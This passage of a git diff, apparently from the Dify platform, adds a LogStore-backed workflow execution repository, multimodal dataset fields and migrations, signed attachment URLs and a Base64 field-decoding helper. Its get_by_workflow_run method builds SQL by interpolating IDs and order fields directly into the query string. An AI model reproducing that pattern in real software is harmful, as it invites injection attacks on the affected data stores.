+ + Args: + data: Dictionary from LogStore query result + + Returns: + WorkflowNodeExecution domain model instance + """ + logger.debug("_dict_to_workflow_node_execution: data keys=%s", list(data.keys())[:5]) + # Parse JSON fields + inputs = json.loads(data.get("inputs", "{}")) + process_data = json.loads(data.get("process_data", "{}")) + outputs = json.loads(data.get("outputs", "{}")) + metadata = json.loads(data.get("execution_metadata", "{}")) + + # Convert metadata to domain enum keys + domain_metadata = {} + for k, v in metadata.items(): + try: + domain_metadata[WorkflowNodeExecutionMetadataKey(k)] = v + except ValueError: + # Skip invalid metadata keys + continue + + # Convert status to domain enum + status = WorkflowNodeExecutionStatus(data.get("status", "running")) + + # Parse datetime fields + created_at = datetime.fromisoformat(data.get("created_at", "")) if data.get("created_at") else datetime.now() + finished_at = datetime.fromisoformat(data.get("finished_at", "")) if data.get("finished_at") else None + + return WorkflowNodeExecution( + id=data.get("id", ""), + node_execution_id=data.get("node_execution_id"), + workflow_id=data.get("workflow_id", ""), + workflow_execution_id=data.get("workflow_run_id"), + index=int(data.get("index", 0)), + predecessor_node_id=data.get("predecessor_node_id"), + node_id=data.get("node_id", ""), + node_type=NodeType(data.get("node_type", "start")), + title=data.get("title", ""), + inputs=inputs, + process_data=process_data, + outputs=outputs, + status=status, + error=data.get("error"), + elapsed_time=float(data.get("elapsed_time", 0.0)), + metadata=domain_metadata, + created_at=created_at, + finished_at=finished_at, + ) + + +class LogstoreWorkflowNodeExecutionRepository(WorkflowNodeExecutionRepository): + """ + LogStore implementation of the WorkflowNodeExecutionRepository interface. + + This implementation uses Aliyun SLS LogStore with an append-only write strategy: + - Each save() operation appends a new record with a version timestamp + - Updates are simulated by writing new records with higher version numbers + - Queries retrieve the latest version using finished_at IS NOT NULL filter + - Multi-tenancy is maintained through tenant_id filtering + + Version Strategy: + version = time.time_ns() # Nanosecond timestamp for unique ordering + """ + + def __init__( + self, + session_factory: sessionmaker | Engine, + user: Union[Account, EndUser], + app_id: str | None, + triggered_from: WorkflowNodeExecutionTriggeredFrom | None, + ): + """ + Initialize the repository with a SQLAlchemy sessionmaker or engine and context information. 
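+
+        Dual-write is toggled via LOGSTORE_DUAL_WRITE_ENABLED (default "true");
+        when enabled, save() also writes through to the SQL repository, and a
+        SQL failure is logged but not raised, since LogStore is the primary store.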
+ + Args: + session_factory: SQLAlchemy sessionmaker or engine for creating sessions + user: Account or EndUser object containing tenant_id, user ID, and role information + app_id: App ID for filtering by application (can be None) + triggered_from: Source of the execution trigger (SINGLE_STEP or WORKFLOW_RUN) + """ + logger.debug( + "LogstoreWorkflowNodeExecutionRepository.__init__: app_id=%s, triggered_from=%s", app_id, triggered_from + ) + # Initialize LogStore client + self.logstore_client = AliyunLogStore() + + # Extract tenant_id from user + tenant_id = extract_tenant_id(user) + if not tenant_id: + raise ValueError("User must have a tenant_id or current_tenant_id") + self._tenant_id = tenant_id + + # Store app context + self._app_id = app_id + + # Extract user context + self._triggered_from = triggered_from + self._creator_user_id = user.id + + # Determine user role based on user type + self._creator_user_role = CreatorUserRole.ACCOUNT if isinstance(user, Account) else CreatorUserRole.END_USER + + # Initialize SQL repository for dual-write support + self.sql_repository = SQLAlchemyWorkflowNodeExecutionRepository(session_factory, user, app_id, triggered_from) + + # Control flag for dual-write (write to both LogStore and SQL database) + # Set to True to enable dual-write for safe migration, False to use LogStore only + self._enable_dual_write = os.environ.get("LOGSTORE_DUAL_WRITE_ENABLED", "true").lower() == "true" + + def _to_logstore_model(self, domain_model: WorkflowNodeExecution) -> Sequence[tuple[str, str]]: + logger.debug( + "_to_logstore_model: id=%s, node_id=%s, status=%s", + domain_model.id, + domain_model.node_id, + domain_model.status.value, + ) + if not self._triggered_from: + raise ValueError("triggered_from is required in repository constructor") + if not self._creator_user_id: + raise ValueError("created_by is required in repository constructor") + if not self._creator_user_role: + raise ValueError("created_by_role is required in repository constructor") + + # Generate log_version as nanosecond timestamp for record versioning + log_version = str(time.time_ns()) + + json_converter = WorkflowRuntimeTypeConverter() + + logstore_model = [ + ("id", domain_model.id), + ("log_version", log_version), # Add log_version field for append-only writes + ("tenant_id", self._tenant_id), + ("app_id", self._app_id or ""), + ("workflow_id", domain_model.workflow_id), + ( + "triggered_from", + self._triggered_from.value if hasattr(self._triggered_from, "value") else str(self._triggered_from), + ), + ("workflow_run_id", domain_model.workflow_execution_id or ""), + ("index", str(domain_model.index)), + ("predecessor_node_id", domain_model.predecessor_node_id or ""), + ("node_execution_id", domain_model.node_execution_id or ""), + ("node_id", domain_model.node_id), + ("node_type", domain_model.node_type.value), + ("title", domain_model.title), + ( + "inputs", + json.dumps(json_converter.to_json_encodable(domain_model.inputs), ensure_ascii=False) + if domain_model.inputs + else "{}", + ), + ( + "process_data", + json.dumps(json_converter.to_json_encodable(domain_model.process_data), ensure_ascii=False) + if domain_model.process_data + else "{}", + ), + ( + "outputs", + json.dumps(json_converter.to_json_encodable(domain_model.outputs), ensure_ascii=False) + if domain_model.outputs + else "{}", + ), + ("status", domain_model.status.value), + ("error", domain_model.error or ""), + ("elapsed_time", str(domain_model.elapsed_time)), + ( + "execution_metadata", + 
json.dumps(jsonable_encoder(domain_model.metadata), ensure_ascii=False) + if domain_model.metadata + else "{}", + ), + ("created_at", domain_model.created_at.isoformat() if domain_model.created_at else ""), + ("created_by_role", self._creator_user_role.value), + ("created_by", self._creator_user_id), + ("finished_at", domain_model.finished_at.isoformat() if domain_model.finished_at else ""), + ] + + return logstore_model + + def save(self, execution: WorkflowNodeExecution) -> None: + """ + Save or update a NodeExecution domain entity to LogStore. + + This method serves as a domain-to-logstore adapter that: + 1. Converts the domain entity to its logstore representation + 2. Appends a new record with a log_version timestamp + 3. Maintains proper multi-tenancy by including tenant context during conversion + 4. Optionally writes to SQL database for dual-write support (controlled by LOGSTORE_DUAL_WRITE_ENABLED) + + Each save operation creates a new record. Updates are simulated by writing + new records with higher log_version numbers. + + Args: + execution: The NodeExecution domain entity to persist + """ + logger.debug( + "save: id=%s, node_execution_id=%s, status=%s", + execution.id, + execution.node_execution_id, + execution.status.value, + ) + try: + logstore_model = self._to_logstore_model(execution) + self.logstore_client.put_log(AliyunLogStore.workflow_node_execution_logstore, logstore_model) + + logger.debug( + "Saved node execution to LogStore: id=%s, node_execution_id=%s, status=%s", + execution.id, + execution.node_execution_id, + execution.status.value, + ) + except Exception: + logger.exception( + "Failed to save node execution to LogStore: id=%s, node_execution_id=%s", + execution.id, + execution.node_execution_id, + ) + raise + + # Dual-write to SQL database if enabled (for safe migration) + if self._enable_dual_write: + try: + self.sql_repository.save(execution) + logger.debug("Dual-write: saved node execution to SQL database: id=%s", execution.id) + except Exception: + logger.exception("Failed to dual-write node execution to SQL database: id=%s", execution.id) + # Don't raise - LogStore write succeeded, SQL is just a backup + + def save_execution_data(self, execution: WorkflowNodeExecution) -> None: + """ + Save or update the inputs, process_data, or outputs associated with a specific + node_execution record. + + For LogStore implementation, this is similar to save() since we always write + complete records. We append a new record with updated data fields. + + Args: + execution: The NodeExecution instance with data to save + """ + logger.debug("save_execution_data: id=%s, node_execution_id=%s", execution.id, execution.node_execution_id) + # In LogStore, we simply write a new complete record with the data + # The log_version timestamp will ensure this is treated as the latest version + self.save(execution) + + def get_by_workflow_run( + self, + workflow_run_id: str, + order_config: OrderConfig | None = None, + ) -> Sequence[WorkflowNodeExecution]: + """ + Retrieve all NodeExecution instances for a specific workflow run. + Uses LogStore SQL query with finished_at IS NOT NULL filter for deduplication. + This ensures we only get the final version of each node execution. 
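+
+        Example (illustrative; OrderConfig fields as consumed below):
+
+            executions = repo.get_by_workflow_run(
+                workflow_run_id="run-uuid",
+                order_config=OrderConfig(order_by=["index"], order_direction="desc"),
+            )
+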
+ Args: + workflow_run_id: The workflow run ID + order_config: Optional configuration for ordering results + order_config.order_by: List of fields to order by (e.g., ["index", "created_at"]) + order_config.order_direction: Direction to order ("asc" or "desc") + + Returns: + A list of NodeExecution instances + + Note: + This method filters by finished_at IS NOT NULL to avoid duplicates from + version updates. For complete history including intermediate states, + a different query strategy would be needed. + """ + logger.debug("get_by_workflow_run: workflow_run_id=%s, order_config=%s", workflow_run_id, order_config) + # Build SQL query with deduplication using finished_at IS NOT NULL + # This optimization avoids window functions for common case where we only + # want the final state of each node execution + + # Build ORDER BY clause + order_clause = "" + if order_config and order_config.order_by: + order_fields = [] + for field in order_config.order_by: + # Map domain field names to logstore field names if needed + field_name = field + if order_config.order_direction == "desc": + order_fields.append(f"{field_name} DESC") + else: + order_fields.append(f"{field_name} ASC") + if order_fields: + order_clause = "ORDER BY " + ", ".join(order_fields) + + sql = f""" + SELECT * + FROM {AliyunLogStore.workflow_node_execution_logstore} + WHERE workflow_run_id='{workflow_run_id}' + AND tenant_id='{self._tenant_id}' + AND finished_at IS NOT NULL + """ + + if self._app_id: + sql += f" AND app_id='{self._app_id}'" + + if order_clause: + sql += f" {order_clause}" + + try: + # Execute SQL query + results = self.logstore_client.execute_sql( + sql=sql, + query="*", + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + + # Convert LogStore results to WorkflowNodeExecution domain models + executions = [] + for row in results: + try: + execution = _dict_to_workflow_node_execution(row) + executions.append(execution) + except Exception as e: + logger.warning("Failed to convert row to WorkflowNodeExecution: %s, row=%s", e, row) + continue + + return executions + + except Exception: + logger.exception("Failed to retrieve node executions from LogStore: workflow_run_id=%s", workflow_run_id) + raise diff --git a/api/extensions/otel/decorators/base.py b/api/extensions/otel/decorators/base.py index 9604a3b6d5..14221d24dd 100644 --- a/api/extensions/otel/decorators/base.py +++ b/api/extensions/otel/decorators/base.py @@ -1,5 +1,4 @@ import functools -import os from collections.abc import Callable from typing import Any, TypeVar, cast @@ -7,22 +6,13 @@ from opentelemetry.trace import get_tracer from configs import dify_config from extensions.otel.decorators.handler import SpanHandler +from extensions.otel.runtime import is_instrument_flag_enabled T = TypeVar("T", bound=Callable[..., Any]) _HANDLER_INSTANCES: dict[type[SpanHandler], SpanHandler] = {SpanHandler: SpanHandler()} -def _is_instrument_flag_enabled() -> bool: - """ - Check if external instrumentation is enabled via environment variable. - - Third-party non-invasive instrumentation agents set this flag to coordinate - with Dify's manual OpenTelemetry instrumentation. 
- """ - return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true" - - def _get_handler_instance(handler_class: type[SpanHandler]) -> SpanHandler: """Get or create a singleton instance of the handler class.""" if handler_class not in _HANDLER_INSTANCES: @@ -43,7 +33,7 @@ def trace_span(handler_class: type[SpanHandler] | None = None) -> Callable[[T], def decorator(func: T) -> T: @functools.wraps(func) def wrapper(*args: Any, **kwargs: Any) -> Any: - if not (dify_config.ENABLE_OTEL or _is_instrument_flag_enabled()): + if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()): return func(*args, **kwargs) handler = _get_handler_instance(handler_class or SpanHandler) diff --git a/api/extensions/otel/runtime.py b/api/extensions/otel/runtime.py index 16f5ccf488..a7181d2683 100644 --- a/api/extensions/otel/runtime.py +++ b/api/extensions/otel/runtime.py @@ -1,4 +1,5 @@ import logging +import os import sys from typing import Union @@ -71,3 +72,13 @@ def init_celery_worker(*args, **kwargs): if dify_config.DEBUG: logger.info("Initializing OpenTelemetry for Celery worker") CeleryInstrumentor(tracer_provider=tracer_provider, meter_provider=metric_provider).instrument() + + +def is_instrument_flag_enabled() -> bool: + """ + Check if external instrumentation is enabled via environment variable. + + Third-party non-invasive instrumentation agents set this flag to coordinate + with Dify's manual OpenTelemetry instrumentation. + """ + return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true" diff --git a/api/extensions/storage/opendal_storage.py b/api/extensions/storage/opendal_storage.py index a084844d72..83c5c2d12f 100644 --- a/api/extensions/storage/opendal_storage.py +++ b/api/extensions/storage/opendal_storage.py @@ -87,15 +87,16 @@ class OpenDALStorage(BaseStorage): if not self.exists(path): raise FileNotFoundError("Path not found") - all_files = self.op.scan(path=path) + # Use the new OpenDAL 0.46.0+ API with recursive listing + lister = self.op.list(path, recursive=True) if files and directories: logger.debug("files and directories on %s scanned", path) - return [f.path for f in all_files] + return [entry.path for entry in lister] if files: logger.debug("files on %s scanned", path) - return [f.path for f in all_files if not f.path.endswith("/")] + return [entry.path for entry in lister if not entry.metadata.is_dir] elif directories: logger.debug("directories on %s scanned", path) - return [f.path for f in all_files if f.path.endswith("/")] + return [entry.path for entry in lister if entry.metadata.is_dir] else: raise ValueError("At least one of files or directories must be True") diff --git a/api/factories/file_factory.py b/api/factories/file_factory.py index 737a79f2b0..bd71f18af2 100644 --- a/api/factories/file_factory.py +++ b/api/factories/file_factory.py @@ -1,3 +1,4 @@ +import logging import mimetypes import os import re @@ -17,6 +18,8 @@ from core.helper import ssrf_proxy from extensions.ext_database import db from models import MessageFile, ToolFile, UploadFile +logger = logging.getLogger(__name__) + def build_from_message_files( *, @@ -356,15 +359,20 @@ def _build_from_tool_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + # Backward/interop compatibility: allow tool_file_id to come from related_id or URL + tool_file_id = mapping.get("tool_file_id") + + if not tool_file_id: + raise ValueError(f"ToolFile {tool_file_id} not found") tool_file = db.session.scalar( select(ToolFile).where( - ToolFile.id == 
mapping.get("tool_file_id"), + ToolFile.id == tool_file_id, ToolFile.tenant_id == tenant_id, ) ) if tool_file is None: - raise ValueError(f"ToolFile {mapping.get('tool_file_id')} not found") + raise ValueError(f"ToolFile {tool_file_id} not found") extension = "." + tool_file.file_key.split(".")[-1] if "." in tool_file.file_key else ".bin" @@ -402,10 +410,13 @@ def _build_from_datasource_file( transfer_method: FileTransferMethod, strict_type_validation: bool = False, ) -> File: + datasource_file_id = mapping.get("datasource_file_id") + if not datasource_file_id: + raise ValueError(f"DatasourceFile {datasource_file_id} not found") datasource_file = ( db.session.query(UploadFile) .where( - UploadFile.id == mapping.get("datasource_file_id"), + UploadFile.id == datasource_file_id, UploadFile.tenant_id == tenant_id, ) .first() diff --git a/api/fields/dataset_fields.py b/api/fields/dataset_fields.py index 89c4d8fba9..1e5ec7d200 100644 --- a/api/fields/dataset_fields.py +++ b/api/fields/dataset_fields.py @@ -97,11 +97,27 @@ dataset_detail_fields = { "total_documents": fields.Integer, "total_available_documents": fields.Integer, "enable_api": fields.Boolean, + "is_multimodal": fields.Boolean, +} + +file_info_fields = { + "id": fields.String, + "name": fields.String, + "size": fields.Integer, + "extension": fields.String, + "mime_type": fields.String, + "source_url": fields.String, +} + +content_fields = { + "content_type": fields.String, + "content": fields.String, + "file_info": fields.Nested(file_info_fields, allow_null=True), } dataset_query_detail_fields = { "id": fields.String, - "content": fields.String, + "queries": fields.Nested(content_fields), "source": fields.String, "source_app_id": fields.String, "created_by_role": fields.String, diff --git a/api/fields/file_fields.py b/api/fields/file_fields.py index c12ebc09c8..a707500445 100644 --- a/api/fields/file_fields.py +++ b/api/fields/file_fields.py @@ -9,6 +9,8 @@ upload_config_fields = { "video_file_size_limit": fields.Integer, "audio_file_size_limit": fields.Integer, "workflow_file_upload_limit": fields.Integer, + "image_file_batch_limit": fields.Integer, + "single_chunk_attachment_limit": fields.Integer, } diff --git a/api/fields/hit_testing_fields.py b/api/fields/hit_testing_fields.py index 75bdff1803..e70f9fa722 100644 --- a/api/fields/hit_testing_fields.py +++ b/api/fields/hit_testing_fields.py @@ -43,9 +43,19 @@ child_chunk_fields = { "score": fields.Float, } +files_fields = { + "id": fields.String, + "name": fields.String, + "size": fields.Integer, + "extension": fields.String, + "mime_type": fields.String, + "source_url": fields.String, +} + hit_testing_record_fields = { "segment": fields.Nested(segment_fields), "child_chunks": fields.List(fields.Nested(child_chunk_fields)), "score": fields.Float, "tsne_position": fields.Raw, + "files": fields.List(fields.Nested(files_fields)), } diff --git a/api/fields/segment_fields.py b/api/fields/segment_fields.py index 2ff917d6bc..56d6b68378 100644 --- a/api/fields/segment_fields.py +++ b/api/fields/segment_fields.py @@ -13,6 +13,15 @@ child_chunk_fields = { "updated_at": TimestampField, } +attachment_fields = { + "id": fields.String, + "name": fields.String, + "size": fields.Integer, + "extension": fields.String, + "mime_type": fields.String, + "source_url": fields.String, +} + segment_fields = { "id": fields.String, "position": fields.Integer, @@ -39,4 +48,5 @@ segment_fields = { "error": fields.String, "stopped_at": TimestampField, "child_chunks": 
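The new `content_fields` / `file_info_fields` determine how a stored query row serializes; a quick flask-restful sketch of the output shape (sample values are illustrative):

```python
from flask_restful import fields, marshal

file_info_fields = {"id": fields.String, "name": fields.String, "mime_type": fields.String}
content_fields = {
    "content_type": fields.String,
    "content": fields.String,
    "file_info": fields.Nested(file_info_fields, allow_null=True),
}

record = {"content_type": "text_query", "content": "hello", "file_info": None}
print(marshal(record, content_fields))
# Text queries carry no file_info; image queries nest the signed file metadata instead.
```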
fields.List(fields.Nested(child_chunk_fields)), + "attachments": fields.List(fields.Nested(attachment_fields)), } diff --git a/api/libs/encryption.py b/api/libs/encryption.py new file mode 100644 index 0000000000..81be8cce97 --- /dev/null +++ b/api/libs/encryption.py @@ -0,0 +1,66 @@ +""" +Field Encoding/Decoding Utilities + +Provides Base64 decoding for sensitive fields (password, verification code) +received from the frontend. + +Note: This uses Base64 encoding for obfuscation, not cryptographic encryption. +Real security relies on HTTPS for transport layer encryption. +""" + +import base64 +import logging + +logger = logging.getLogger(__name__) + + +class FieldEncryption: + """Handle decoding of sensitive fields during transmission""" + + @classmethod + def decrypt_field(cls, encoded_text: str) -> str | None: + """ + Decode Base64 encoded field from frontend. + + Args: + encoded_text: Base64 encoded text from frontend + + Returns: + Decoded plaintext, or None if decoding fails + """ + try: + # Decode base64 + decoded_bytes = base64.b64decode(encoded_text) + decoded_text = decoded_bytes.decode("utf-8") + logger.debug("Field decoding successful") + return decoded_text + + except Exception: + # Decoding failed - return None to trigger error in caller + return None + + @classmethod + def decrypt_password(cls, encrypted_password: str) -> str | None: + """ + Decrypt password field + + Args: + encrypted_password: Encrypted password from frontend + + Returns: + Decrypted password or None if decryption fails + """ + return cls.decrypt_field(encrypted_password) + + @classmethod + def decrypt_verification_code(cls, encrypted_code: str) -> str | None: + """ + Decrypt verification code field + + Args: + encrypted_code: Encrypted code from frontend + + Returns: + Decrypted code or None if decryption fails + """ + return cls.decrypt_field(encrypted_code) diff --git a/api/libs/helper.py b/api/libs/helper.py index 0506e0ed5f..74e1808e49 100644 --- a/api/libs/helper.py +++ b/api/libs/helper.py @@ -11,6 +11,7 @@ from collections.abc import Generator, Mapping from datetime import datetime from hashlib import sha256 from typing import TYPE_CHECKING, Annotated, Any, Optional, Union, cast +from uuid import UUID from zoneinfo import available_timezones from flask import Response, stream_with_context @@ -107,7 +108,7 @@ def email(email): EmailStr = Annotated[str, AfterValidator(email)] -def uuid_value(value): +def uuid_value(value: Any) -> str: if value == "": return str(value) @@ -119,6 +120,19 @@ def uuid_value(value): raise ValueError(error) +def normalize_uuid(value: str | UUID) -> str: + if not value: + return "" + + try: + return uuid_value(value) + except ValueError as exc: + raise ValueError("must be a valid UUID") from exc + + +UUIDStrOrEmpty = Annotated[str, AfterValidator(normalize_uuid)] + + def alphanumeric(value: str): # check if the value is alphanumeric and underlined if re.match(r"^[a-zA-Z0-9_]+$", value): @@ -184,7 +198,7 @@ def timezone(timezone_string): def convert_datetime_to_date(field, target_timezone: str = ":tz"): if dify_config.DB_TYPE == "postgresql": return f"DATE(DATE_TRUNC('day', {field} AT TIME ZONE 'UTC' AT TIME ZONE {target_timezone}))" - elif dify_config.DB_TYPE == "mysql": + elif dify_config.DB_TYPE in ["mysql", "oceanbase", "seekdb"]: return f"DATE(CONVERT_TZ({field}, 'UTC', {target_timezone}))" else: raise NotImplementedError(f"Unsupported database type: {dify_config.DB_TYPE}") @@ -215,7 +229,11 @@ def generate_text_hash(text: str) -> str: def 
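Since `FieldEncryption` is plain Base64 (obfuscation, not cryptography, as its module docstring notes), a round trip is easy to verify. A minimal usage sketch against the module added above:

```python
import base64

from libs.encryption import FieldEncryption

encoded = base64.b64encode("S3cret!".encode("utf-8")).decode()  # what the frontend would send
assert FieldEncryption.decrypt_password(encoded) == "S3cret!"
assert FieldEncryption.decrypt_field("abc") is None  # malformed input maps to None, not an exception
```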
compact_generate_response(response: Union[Mapping, Generator, RateLimitGenerator]) -> Response: if isinstance(response, dict): - return Response(response=json.dumps(jsonable_encoder(response)), status=200, mimetype="application/json") + return Response( + response=json.dumps(jsonable_encoder(response)), + status=200, + content_type="application/json; charset=utf-8", + ) else: def generate() -> Generator: diff --git a/api/migrations/versions/2025_11_12_1537-d57accd375ae_support_multi_modal.py b/api/migrations/versions/2025_11_12_1537-d57accd375ae_support_multi_modal.py new file mode 100644 index 0000000000..187bf7136d --- /dev/null +++ b/api/migrations/versions/2025_11_12_1537-d57accd375ae_support_multi_modal.py @@ -0,0 +1,57 @@ +"""support-multi-modal + +Revision ID: d57accd375ae +Revises: 03f8dcbc611e +Create Date: 2025-11-12 15:37:12.363670 + +""" +from alembic import op +import models as models +import sqlalchemy as sa + + +# revision identifiers, used by Alembic. +revision = 'd57accd375ae' +down_revision = '7bb281b7a422' +branch_labels = None +depends_on = None + + +def upgrade(): + # ### commands auto generated by Alembic - please adjust! ### + op.create_table('segment_attachment_bindings', + sa.Column('id', models.types.StringUUID(), nullable=False), + sa.Column('tenant_id', models.types.StringUUID(), nullable=False), + sa.Column('dataset_id', models.types.StringUUID(), nullable=False), + sa.Column('document_id', models.types.StringUUID(), nullable=False), + sa.Column('segment_id', models.types.StringUUID(), nullable=False), + sa.Column('attachment_id', models.types.StringUUID(), nullable=False), + sa.Column('created_at', sa.DateTime(), server_default=sa.text("CURRENT_TIMESTAMP"), nullable=False), + sa.PrimaryKeyConstraint('id', name='segment_attachment_binding_pkey') + ) + with op.batch_alter_table('segment_attachment_bindings', schema=None) as batch_op: + batch_op.create_index( + 'segment_attachment_binding_tenant_dataset_document_segment_idx', + ['tenant_id', 'dataset_id', 'document_id', 'segment_id'], + unique=False + ) + batch_op.create_index('segment_attachment_binding_attachment_idx', ['attachment_id'], unique=False) + + with op.batch_alter_table('datasets', schema=None) as batch_op: + batch_op.add_column(sa.Column('is_multimodal', sa.Boolean(), server_default=sa.text('false'), nullable=False)) + + # ### end Alembic commands ### + + +def downgrade(): + # ### commands auto generated by Alembic - please + with op.batch_alter_table('datasets', schema=None) as batch_op: + batch_op.drop_column('is_multimodal') + + + with op.batch_alter_table('segment_attachment_bindings', schema=None) as batch_op: + batch_op.drop_index('segment_attachment_binding_attachment_idx') + batch_op.drop_index('segment_attachment_binding_tenant_dataset_document_segment_idx') + + op.drop_table('segment_attachment_bindings') + # ### end Alembic commands ### diff --git a/api/migrations/versions/2025_11_15_2102-09cfdda155d1_mysql_adaptation.py b/api/migrations/versions/2025_11_15_2102-09cfdda155d1_mysql_adaptation.py index a3f6c3cb19..877fa2f309 100644 --- a/api/migrations/versions/2025_11_15_2102-09cfdda155d1_mysql_adaptation.py +++ b/api/migrations/versions/2025_11_15_2102-09cfdda155d1_mysql_adaptation.py @@ -1,4 +1,4 @@ -"""empty message +"""mysql adaptation Revision ID: 09cfdda155d1 Revises: 669ffd70119c @@ -97,11 +97,31 @@ def downgrade(): batch_op.alter_column('include_plugins', existing_type=sa.JSON(), type_=postgresql.ARRAY(sa.VARCHAR(length=255)), - existing_nullable=False) + existing_nullable=False, + 
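`normalize_uuid` and the `UUIDStrOrEmpty` annotation accept either a `UUID` instance or a string and pass empty values through. A quick sketch of the contract, assuming `uuid_value` round-trips valid input as shown above:

```python
from uuid import uuid4

from libs.helper import normalize_uuid

assert normalize_uuid("") == ""         # empty values pass through unchanged
uid = uuid4()
assert normalize_uuid(uid) == str(uid)  # UUID instances normalize to their string form
try:
    normalize_uuid("not-a-uuid")
except ValueError as exc:
    assert "must be a valid UUID" in str(exc)
```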
postgresql_using=""" + COALESCE( + regexp_replace( + replace(replace(include_plugins::text, '[', '{'), ']', '}'), + '"', + '', + 'g' + )::varchar(255)[], + ARRAY[]::varchar(255)[] + )""") batch_op.alter_column('exclude_plugins', existing_type=sa.JSON(), type_=postgresql.ARRAY(sa.VARCHAR(length=255)), - existing_nullable=False) + existing_nullable=False, + postgresql_using=""" + COALESCE( + regexp_replace( + replace(replace(exclude_plugins::text, '[', '{'), ']', '}'), + '"', + '', + 'g' + )::varchar(255)[], + ARRAY[]::varchar(255)[] + )""") with op.batch_alter_table('external_knowledge_bindings', schema=None) as batch_op: batch_op.alter_column('external_knowledge_id', diff --git a/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py b/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py new file mode 100644 index 0000000000..2bdd430e81 --- /dev/null +++ b/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py @@ -0,0 +1,31 @@ +"""add type column not null default tool + +Revision ID: 03ea244985ce +Revises: d57accd375ae +Create Date: 2025-12-16 18:17:12.193877 + +""" +from alembic import op +import models as models +import sqlalchemy as sa +from sqlalchemy.dialects import postgresql + +# revision identifiers, used by Alembic. +revision = '03ea244985ce' +down_revision = 'd57accd375ae' +branch_labels = None +depends_on = None + + +def upgrade(): + # ### commands auto generated by Alembic - please adjust! ### + with op.batch_alter_table('pipeline_recommended_plugins', schema=None) as batch_op: + batch_op.add_column(sa.Column('type', sa.String(length=50), server_default=sa.text("'tool'"), nullable=False)) + # ### end Alembic commands ### + + +def downgrade(): + # ### commands auto generated by Alembic - please adjust! 
### + with op.batch_alter_table('pipeline_recommended_plugins', schema=None) as batch_op: + batch_op.drop_column('type') + # ### end Alembic commands ### diff --git a/api/models/dataset.py b/api/models/dataset.py index e072711b82..445ac6086f 100644 --- a/api/models/dataset.py +++ b/api/models/dataset.py @@ -19,7 +19,9 @@ from sqlalchemy.orm import Mapped, Session, mapped_column from configs import dify_config from core.rag.index_processor.constant.built_in_field import BuiltInField, MetadataDataSource +from core.rag.index_processor.constant.query_type import QueryType from core.rag.retrieval.retrieval_methods import RetrievalMethod +from core.tools.signature import sign_upload_file from extensions.ext_storage import storage from libs.uuid_utils import uuidv7 from services.entities.knowledge_entities.knowledge_entities import ParentMode, Rule @@ -76,6 +78,7 @@ class Dataset(Base): pipeline_id = mapped_column(StringUUID, nullable=True) chunk_structure = mapped_column(sa.String(255), nullable=True) enable_api = mapped_column(sa.Boolean, nullable=False, server_default=sa.text("true")) + is_multimodal = mapped_column(sa.Boolean, default=False, nullable=False, server_default=db.text("false")) @property def total_documents(self): @@ -728,9 +731,7 @@ class DocumentSegment(Base): created_by = mapped_column(StringUUID, nullable=False) created_at: Mapped[datetime] = mapped_column(DateTime, nullable=False, server_default=func.current_timestamp()) updated_by = mapped_column(StringUUID, nullable=True) - updated_at: Mapped[datetime] = mapped_column( - DateTime, nullable=False, server_default=func.current_timestamp(), onupdate=func.current_timestamp() - ) + updated_at: Mapped[datetime] = mapped_column(DateTime, nullable=False, server_default=func.current_timestamp()) indexing_at: Mapped[datetime | None] = mapped_column(DateTime, nullable=True) completed_at: Mapped[datetime | None] = mapped_column(DateTime, nullable=True) error = mapped_column(LongText, nullable=True) @@ -866,6 +867,47 @@ class DocumentSegment(Base): return text + @property + def attachments(self) -> list[dict[str, Any]]: + # Use JOIN to fetch attachments in a single query instead of two separate queries + attachments_with_bindings = db.session.execute( + select(SegmentAttachmentBinding, UploadFile) + .join(UploadFile, UploadFile.id == SegmentAttachmentBinding.attachment_id) + .where( + SegmentAttachmentBinding.tenant_id == self.tenant_id, + SegmentAttachmentBinding.dataset_id == self.dataset_id, + SegmentAttachmentBinding.document_id == self.document_id, + SegmentAttachmentBinding.segment_id == self.id, + ) + ).all() + if not attachments_with_bindings: + return [] + attachment_list = [] + for _, attachment in attachments_with_bindings: + upload_file_id = attachment.id + nonce = os.urandom(16).hex() + timestamp = str(int(time.time())) + data_to_sign = f"image-preview|{upload_file_id}|{timestamp}|{nonce}" + secret_key = dify_config.SECRET_KEY.encode() if dify_config.SECRET_KEY else b"" + sign = hmac.new(secret_key, data_to_sign.encode(), hashlib.sha256).digest() + encoded_sign = base64.urlsafe_b64encode(sign).decode() + + params = f"timestamp={timestamp}&nonce={nonce}&sign={encoded_sign}" + reference_url = dify_config.CONSOLE_API_URL or "" + base_url = f"{reference_url}/files/{upload_file_id}/image-preview" + source_url = f"{base_url}?{params}" + attachment_list.append( + { + "id": attachment.id, + "name": attachment.name, + "size": attachment.size, + "extension": attachment.extension, + "mime_type": attachment.mime_type, + "source_url": 
source_url, + } + ) + return attachment_list + class ChildChunk(Base): __tablename__ = "child_chunks" @@ -963,6 +1005,38 @@ class DatasetQuery(TypeBase): DateTime, nullable=False, server_default=sa.func.current_timestamp(), init=False ) + @property + def queries(self) -> list[dict[str, Any]]: + try: + queries = json.loads(self.content) + if isinstance(queries, list): + for query in queries: + if query["content_type"] == QueryType.IMAGE_QUERY: + file_info = db.session.query(UploadFile).filter_by(id=query["content"]).first() + if file_info: + query["file_info"] = { + "id": file_info.id, + "name": file_info.name, + "size": file_info.size, + "extension": file_info.extension, + "mime_type": file_info.mime_type, + "source_url": sign_upload_file(file_info.id, file_info.extension), + } + else: + query["file_info"] = None + + return queries + else: + return [queries] + except JSONDecodeError: + return [ + { + "content_type": QueryType.TEXT_QUERY, + "content": self.content, + "file_info": None, + } + ] + class DatasetKeywordTable(TypeBase): __tablename__ = "dataset_keyword_tables" @@ -1458,6 +1532,7 @@ class PipelineRecommendedPlugin(TypeBase): ) plugin_id: Mapped[str] = mapped_column(LongText, nullable=False) provider_name: Mapped[str] = mapped_column(LongText, nullable=False) + type: Mapped[str] = mapped_column(sa.String(50), nullable=False, server_default=sa.text("'tool'")) position: Mapped[int] = mapped_column(sa.Integer, nullable=False, default=0) active: Mapped[bool] = 